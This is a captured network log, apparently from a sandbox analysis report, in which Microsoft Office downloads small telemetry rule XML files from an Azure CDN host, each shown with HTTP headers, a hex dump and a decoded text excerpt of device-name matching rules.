                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:51 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                  ETag: "0x8DC582B9D43097E"
                                                                                                                  x-ms-request-id: 53aae69c-201e-005d-6aa2-34afb3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-1749fc9bdbdr6qwphC1DFW0nv400000002n000000000e274
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  79192.168.2.44984113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:51 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 427
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                  ETag: "0x8DC582BA909FA21"
                                                                                                                  x-ms-request-id: 03686dcf-301e-0099-31a0-346683000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-r178fb8d765tllwdhC1DFWaz8400000002m000000000gz3f
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  80192.168.2.44984213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:51 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 486
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                  ETag: "0x8DC582B92FCB436"
                                                                                                                  x-ms-request-id: e1bc049e-701e-003e-11a5-3479b3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-1749fc9bdbdmg6wshC1DFWu2bc00000002n000000000dewn
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  81192.168.2.44984513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:52 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 423
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                  ETag: "0x8DC582BB7564CE8"
                                                                                                                  x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-16547b76f7f8dwtrhC1DFWd1zn0000000kwg000000006856
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  82192.168.2.44984613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:52 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 478
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                  ETag: "0x8DC582B9B233827"
                                                                                                                  x-ms-request-id: aa8338a3-a01e-0021-72a2-34814c000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-r178fb8d765tllwdhC1DFWaz8400000002rg000000008td1
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  83192.168.2.44984713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:52 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 404
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                  ETag: "0x8DC582B95C61A3C"
                                                                                                                  x-ms-request-id: 2b6e93c1-f01e-00aa-0c07-368521000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-1749fc9bdbds4vwlhC1DFWz44000000002dg00000000frs5
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  84192.168.2.44984913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:52 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                  ETag: "0x8DC582BB046B576"
                                                                                                                  x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-16547b76f7frbg6bhC1DFWr5400000000kqg000000005p85
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  85192.168.2.44985013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:52 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:52 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 400
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                  ETag: "0x8DC582BB2D62837"
                                                                                                                  x-ms-request-id: f331b341-a01e-0070-670c-36573b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140052Z-1749fc9bdbddrtrhhC1DFWsq8000000002rg000000006409
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:52 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  86192.168.2.44985313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:53 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 425
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                  ETag: "0x8DC582BBA25094F"
                                                                                                                  x-ms-request-id: 79c751c3-501e-0078-3aa2-3406cf000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-1749fc9bdbd2jxtthC1DFWfk5w00000002hg000000009480
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  87192.168.2.44985413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:53 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 475
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                  ETag: "0x8DC582BB2BE84FD"
                                                                                                                  x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-16547b76f7fk9g8vhC1DFW825400000000pg000000008q43
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  88192.168.2.44985213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:53 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 479
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                  ETag: "0x8DC582BB7D702D0"
                                                                                                                  x-ms-request-id: 87bd4a9e-701e-0021-04a0-343d45000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-1749fc9bdbddrtrhhC1DFWsq8000000002sg0000000046s5
                                                                                                                  x-fd-int-roxy-purgeid: 0
